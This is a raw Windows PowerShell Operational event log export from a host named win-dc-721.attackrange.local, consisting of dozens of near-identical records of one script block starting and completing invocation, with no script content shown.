RecordNumber=1467818
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467817
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467816
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467815
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467814
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467813
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467812
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467811
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467810
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467809
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467808
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467807
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467806
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467805
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467804
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467803
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467802
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467801
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467800
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467799
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467798
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467797
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467796
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467795
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467794
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467793
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467792
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467791
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467790
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467789
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467788
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467787
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467786
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467785
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467784
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467783
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467782
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467781
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467780
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467779
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467778
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467777
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467776
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467775
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467774
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467773
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467772
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467771
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467770
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467769
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467768
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467767
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467766
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467765
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467764
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467763
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
